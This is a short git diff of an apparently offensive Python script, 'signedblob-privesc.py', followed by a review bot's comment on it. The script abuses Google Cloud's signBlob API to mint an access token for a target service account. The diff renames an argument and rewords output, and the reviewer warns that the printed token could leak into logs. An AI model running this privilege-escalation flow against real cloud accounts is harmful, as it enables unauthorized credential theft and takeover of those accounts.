Diffstat (limited to 'signedblob-privesc.py')
| -rw-r--r-- | signedblob-privesc.py | 8 |
1 files changed, 3 insertions, 5 deletions
diff --git a/signedblob-privesc.py b/signedblob-privesc.py
index b0c701b..d105261 100644
--- a/signedblob-privesc.py
+++ b/signedblob-privesc.py
@@ -34,10 +34,8 @@ def getTokenFromKeyFile(keyfile_path):
 return creds.token
 def executeSignBlob(bearer_token, target_sa):
- print("[*] Constructing a JWT")
 unsigned_jwt = createJwt(target_sa)
- print("[*] Getting a signed Blob")
 sign_url = f"https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/{target_sa}:signBlob"
 headers = {
 "Authorization": f"Bearer {bearer_token}",
@@ -73,7 +71,7 @@ def main():
 group.add_argument("-f", "--token-file", help="Path to file containing Access Token")
 group.add_argument("-k", "--key-file", help="Path to Service Account JSON key file")
- parser.add_argument("-s", "--target", required=True, help="Target Service Account Email")
+ parser.add_argument("-s", "--target-account", required=True, help="Target Service Account Email")
 args = parser.parse_args()
 caller_token = None
@@ -89,9 +87,9 @@ def main():
 print("[!] Could not retrieve a valid caller token.")
 sys.exit(1)
- result = executeSignBlob(caller_token, args.target)
+ result = executeSignBlob(caller_token, args.target_account)
 if result:
- print("[*] Got Token:")
+ print(f"[*] Successfully retrieved Access Token for {args.target_account}")
 print(json.dumps(result, indent=2))
 if __name__ == "__main__": |
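Review bot: The new success line in the last hunk is immediately followed by `print(json.dumps(result, indent=2))`, which writes what is apparently a live access token to stdout with no comment on how that output should be handled. Anything that captures the terminal (session recording, CI logs, shell redirection to a world-readable file) then holds a usable credential for as long as the token is valid. I would add a comment above the dump such as `# NOTE: prints a live credential; keep this output out of logs and shared terminals`. The message is also gated only on the truthiness of `result`, so if executeSignBlob (not fully visible here) can return a non-empty error body, "Successfully retrieved" would be misleading. main() begins above this hunk.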
